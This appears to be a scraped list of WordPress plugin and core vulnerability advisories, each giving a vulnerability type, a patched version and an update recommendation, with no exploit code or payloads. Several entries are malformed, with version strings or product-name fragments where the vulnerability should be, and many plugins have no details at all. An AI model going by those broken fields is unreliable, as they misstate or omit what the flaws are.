Plugin: MainWP Page Speed Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Kanban Boards for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.5.21
Recommended Action: Update to version 2.5.21, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 5.153.4
Recommended Action: Update to version 5.153.4, or a newer patched version

Plugin: Nextend Social Login and Register

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Locatoraid Store Locator

Vulnerability: Cross Site Request Forgery in grab
Patched Version: 3.9.12
Recommended Action: Update to version 3.9.12, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: EWWW Image Optimizer

Vulnerability: Remote Code Execution
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: Waiting: One-click countdowns

Plugin: Simple Matted Thumbnails

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.6.4
Recommended Action: Update to version 1.9.6.4, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Authenticated (Subscriber+) Local File Include, Server-Side Request Forgery, and PHAR Deserialization via file_get_contents
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Administrator+ Stored Cross-Site Scripting
Patched Version: 3.3.17
Recommended Action: Update to version 3.3.17, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Breeze – WordPress Cache Plugin

Vulnerability: Cross-Site Request Forgery via import_json_settings
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Unauthenticated Insecure Direct Object Reference
Patched Version: 1.0.31
Recommended Action: Update to version 1.0.31, or a newer patched version

Plugin: Quick Restaurant Reservations

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass Allowing Post Meta Updates
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: PhastPress

Vulnerability: Open Redirect
Patched Version: 1.111
Recommended Action: Update to version 1.111, or a newer patched version

Plugin: WordSpew

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated Subscriber Download
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: Google Forms

Plugin: Comments Ratings

Plugin: Invite Anyone

Vulnerability: Change of Email Invitation Content
Patched Version: 1.3.15
Recommended Action: Update to version 1.3.15, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Excessive Quiz Attempts
Patched Version: 8.1.11
Recommended Action: Update to version 8.1.11, or a newer patched version

Plugin: FluentSMTP – WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Email Logs
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: API KEY for Google Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: BP Profile Search

Vulnerability: Reflected Cross-Site Scripting via BPS_FORM
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: Judge.me Product Reviews for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.21
Recommended Action: Update to version 1.3.21, or a newer patched version

Core: WordPress

Vulnerability: Comment Disclosure
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: Easy Canadian Sales Taxes Add-On for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Organizer

Plugin: WP Booking System – Booking Calendar

Vulnerability: Missing Authorization
Patched Version: 2.0.19.3
Recommended Action: Update to version 2.0.19.3, or a newer patched version

Plugin: A WordPress Testimonial Plugin to Showcase Testimonial Slider, Testimonial Grid and More: Solid Testimonials

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Cryptocurrency Widgets Pack

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Prime Mover – Migrate WordPress Website & Backups

Vulnerability: Sensitive Information Exposure via Directory Listing
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: SQL Injection
Patched Version: 2.9.5.118
Recommended Action: Update to version 2.9.5.118, or a newer patched version

Plugin: WordPress WP-Advanced-Search

Vulnerability: Remote Code Execution
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: MapSVG – Vector maps, Image maps, Google Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_clone_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: WP Maintenance Mode & Site Under Construction

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: 6.1.6
Patched Version: 6.1.7
Recommended Action: Update to version 6.1.7, or a newer patched version

Plugin: Animal Captcha

Plugin: Multi Rating

Vulnerability: Cross-Site Request Forgery to Arbitrary Ratings Value Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy PayPal & Stripe Buy Now Button

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Cookie Bar

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Missing Authorization
Patched Version: 2.4.3.1
Recommended Action: Update to version 2.4.3.1, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Stored Cross-Site Scripting
Patched Version: 9.1.2
Recommended Action: Update to version 9.1.2, or a newer patched version

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Missing Authorization to Arbitrary FAQ Creation
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Kenta Blocks – Responsive Blocks and block templates library

Vulnerability: Missing Authorization
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Best Contact Management Software for WordPress

Plugin: RestroPress – Online Food Ordering System

Vulnerability: Cross-Site Request Forgery to Cart Manipulation
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Advanced XML Reader

Vulnerability: XML External Entity Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YourMembers

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Redirect Creation via Unprotected REST API Endpoint
Patched Version: 1.0.41
Recommended Action: Update to version 1.0.41, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Administrative User Creation
Patched Version: 0.3.0
Recommended Action: Update to version 0.3.0, or a newer patched version

Plugin: Video Downloader for TikTok

Vulnerability: Server-Side Request Forgery
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: TypeSquare Webfonts for ConoHa

Plugin: Backend Localization

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Multiple Vectors
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: ThinkIT WP Contact Form

Vulnerability: Cross-Site Scripting
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Featured Comments

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Missing Authorization
Patched Version: 8.22.0
Recommended Action: Update to version 8.22.0, or a newer patched version

Plugin: WP Captcha

Plugin: Simplr Registration Form Plus+

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Simple Iframe

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via block attributes
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Reflected Cross-Site Scripting via b2s_id Parameter
Patched Version: 5.9.0
Recommended Action: Update to version 5.9.0, or a newer patched version

Plugin: iFlyChat – WordPress Chat

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: HT Slider For Elementor

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Post Lockage
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: Image Map Pro – Drag-and-drop Builder for Interactive Images

Plugin: WPRealty

Vulnerability: Time-Based Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: adminer

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Extra User Details

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Social Sharing Plugin – Kiwi

Vulnerability: 2.1.2
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Menubar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8
Recommended Action: Update to version 5.8, or a newer patched version

Plugin: Short URL

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Bypass via IP Spoofing
Patched Version: 2.29.2
Recommended Action: Update to version 2.29.2, or a newer patched version

Plugin: Product Slider For WooCommerce Lite

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Meta Keys
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: When Last Login

Vulnerability: Cross-Site Request Forgery via wll_hide_subscription_notice
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Easy restaurant menu manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Print-O-Matic

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Post Modification
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue)

Vulnerability: Reflected Cross-Site Scripting via lang & pid Parameters
Patched Version: 3.1.31
Recommended Action: Update to version 3.1.31, or a newer patched version

Plugin: Integration for WooCommerce and QuickBooks

Vulnerability: Open Redirect via setup_plugin
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Authenticated(Subscriber+) SQL Injection
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: classyfrieds

Plugin: reSmush.it : The original free image compressor and optimizer plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.4.7
Recommended Action: Update to version 0.4.7, or a newer patched version

Plugin: iframe forms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via iframe Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.5.10
Recommended Action: Update to version 2.5.10, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.3.8.1
Recommended Action: Update to version 3.3.8.1, or a newer patched version

Plugin: Smart Forms – when you need more than just a contact form

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.26
Recommended Action: Update to version 2.6.26, or a newer patched version

Plugin: Klarna Checkout for WooCommerce

Vulnerability: Arbitrary Plugin Installation, Activation and Deactivation
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: Asset CleanUp: Page Speed Booster

Vulnerability: Reflected Cross-Site Scripting via AJAX Action
Patched Version: 1.3.8.5
Recommended Action: Update to version 1.3.8.5, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Logo Carousel

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting in Product XML Feeds Module
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Levo Slideshow

Plugin: Print, PDF, Email by PrintFriendly

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: SoundCloud Is Gold

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: Icon Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: IBPS Online Exam Plugin for WordPress

Plugin: Poll, Survey, Questionnaire and Voting system

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: CAPTCHA in Thai

Plugin: WordPress Landing Page – Squeeze Page – Responsive Landing Page Builder Free – WP Lead Plus X

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.99
Recommended Action: Update to version 0.99, or a newer patched version

Plugin: Order Tracking – WordPress Status Tracking Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.2.24
Recommended Action: Update to version 2.2.24, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via mf_thankyou shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Remote Code Execution via Improper Capability Checks in AJAX Calls
Patched Version: 2.54.6
Recommended Action: Update to version 2.54.6, or a newer patched version

Plugin: Accommodation System

Plugin: Premium Packages – Sell Digital Products Securely

Vulnerability: Sell Digital Products Securely <= 5.7.4
Patched Version: 5.7.5
Recommended Action: Update to version 5.7.5, or a newer patched version

Plugin: Greenshift – animation and page builder blocks

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 7.6.3
Recommended Action: Update to version 7.6.3, or a newer patched version

Plugin: User Registration, Login & Landing Pages – LeadMagic

Plugin: WpGenius Job Listing

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Sell Photo

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: quartz

Plugin: MediaElement.js – HTML5 Video & Audio Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.16
Recommended Action: Update to version 2.9.16, or a newer patched version

Plugin: RSS Feed Retriever

Vulnerability: Missing Authorization
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Privilege Escalation
Patched Version: 3.2.6.8
Recommended Action: Update to version 3.2.6.8, or a newer patched version

Plugin: wp-download-manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.61
Recommended Action: Update to version 1.61, or a newer patched version

Plugin: WRC Pricing Tables – Responsive CSS3 Pricing Tables

Vulnerability: Missing Authorization
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: TI WooCommerce Wishlist

Vulnerability: Unauthenticated Blind SQL Injection via Rest API
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via block attribute
Patched Version: 12.8-a.3
Recommended Action: Update to version 12.8-a.3, or a newer patched version

Plugin: Upload Resume

Vulnerability: Authenticated Sensitive Information Disclosure via resume_upload_form_list shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zingiri Web Shop

Vulnerability: Remote Code Execution
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Smash Balloon Social Photo Feed – Easy Social Feeds Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: bookmarkify

Plugin: Redirection

Vulnerability: Missing Authorization in ‘LoadTab’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Front End PM

Vulnerability: Sensitive Information Exposure via Directory Listing
Patched Version: 11.4.3
Recommended Action: Update to version 11.4.3, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Sensitive File Disclosure
Patched Version: 4.58
Recommended Action: Update to version 4.58, or a newer patched version

Plugin: Site Reviews

Vulnerability: Cross-Site Scripting
Patched Version: 2.15.3
Recommended Action: Update to version 2.15.3, or a newer patched version

Plugin: Simple Post Notes

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: IgnitionDeck Crowdfunding Platform

Vulnerability: Missing Authorization
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: 12 Step Meeting List

Vulnerability: Missing Authorization
Patched Version: 3.14.29
Recommended Action: Update to version 3.14.29, or a newer patched version

Plugin: Product Compare for WooCommerce

Vulnerability: Missing Authorization via settings_init
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: GMAce

Vulnerability: Cross-Site Request Forgery to Arbitrary File Modification (Creation/Overwrite/Deletion)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Greenshift – animation and page builder blocks

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.2.3.0
Recommended Action: Update to version 6.2.3.0, or a newer patched version

Plugin: Thinkific Uploader

Plugin: Product Recommendations

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Real3D Flipbook

Vulnerability: Unauthenticated Arbitrary File or Directory Delete
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: WP Popup Banners

Plugin: BSK Forms Blacklist

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: The Events Calendar

Vulnerability: Information Disclosure
Patched Version: 6.2.8.1
Recommended Action: Update to version 6.2.8.1, or a newer patched version

Plugin: Welcome Bar

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Post Snippets – Custom WordPress Code Snippets Customizer

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: ZM Ajax Login & Register

Vulnerability: Local File Inclusion
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: LiteSpeed Cache

Vulnerability: Reflected Cross-Site Scripting via qc_res
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Library Viewer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.6.1
Recommended Action: Update to version 2.0.6.1, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via wdk_resultitem
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Divi Builder

Vulnerability: 4.0.9, Divi Extra 2.23
Patched Version: 4.0.10
Recommended Action: Update to version 4.0.10, or a newer patched version

Plugin: 2 Click Social Media Buttons

Vulnerability: Cross-Site Scripting
Patched Version: 0.34
Recommended Action: Update to version 0.34, or a newer patched version

Plugin: User Domain Whitelist

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: QR Redirector

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: We’re Open!

Vulnerability: Missing Authorization
Patched Version: 1.45
Recommended Action: Update to version 1.45, or a newer patched version

Plugin: Call Now Icon Animate

Plugin: Accept Stripe Payments

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.64
Recommended Action: Update to version 2.0.64, or a newer patched version

Plugin: CiviCRM for WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 5.28.1
Recommended Action: Update to version 5.28.1, or a newer patched version

Plugin: wp-lightpop

Vulnerability: Remote Media File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hunk External Links

Plugin: Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Private Content Disclosure
Patched Version: 2.4.10
Recommended Action: Update to version 2.4.10, or a newer patched version

Plugin: Updater by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.35
Recommended Action: Update to version 1.35, or a newer patched version

Plugin: Swift Performance Lite

Vulnerability: Missing Authorization to Unauthenticated Settings Export
Patched Version: 2.3.6.15
Recommended Action: Update to version 2.3.6.15, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.6.1
Recommended Action: Update to version 7.6.1, or a newer patched version

Plugin: Meta Box

Vulnerability: WordPress Custom Fields Framework <= 4.16.2
Patched Version: 4.16.3
Recommended Action: Update to version 4.16.3, or a newer patched version

Plugin: WP-Property – WordPress Powered Real Estate and Property Management

Vulnerability: Information Disclosure
Patched Version: 1.38.4
Recommended Action: Update to version 1.38.4, or a newer patched version

Plugin: Student Result or Employee Database

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Docket Cache – Object Cache Accelerator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 21.08.02
Recommended Action: Update to version 21.08.02, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Subscriber+ Event Creation
Patched Version: 1.1.51
Recommended Action: Update to version 1.1.51, or a newer patched version

Plugin: SpamBam

Plugin: HK Exif Tags

Vulnerability: Cross-Site Scripting
Patched Version: 1.12
Recommended Action: Update to version 1.12, or a newer patched version

Plugin: WP-FaceThumb

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Stored Cross-Site Scripting via Uploaded SVG
Patched Version: 1.5.75
Recommended Action: Update to version 1.5.75, or a newer patched version

Plugin: Quick Event Manager

Vulnerability: Unauthenticated Stored Cross Site Scripting
Patched Version: 9.7.5
Recommended Action: Update to version 9.7.5, or a newer patched version

Plugin: InventoryPress

Vulnerability: Authenticated(Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Footnotes

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Insecure Cryptography to Sensitive Information Disclosure
Patched Version: 0.9.2.5
Recommended Action: Update to version 0.9.2.5, or a newer patched version

Plugin: wp-keyword-link

Plugin: WP-Reply Notify

Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Simple Job Board

Vulnerability: Information Disclosure
Patched Version: 2.9.10
Recommended Action: Update to version 2.9.10, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.46.1
Recommended Action: Update to version 2.46.1, or a newer patched version

Plugin: Website Contact Form With File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Simple Membership

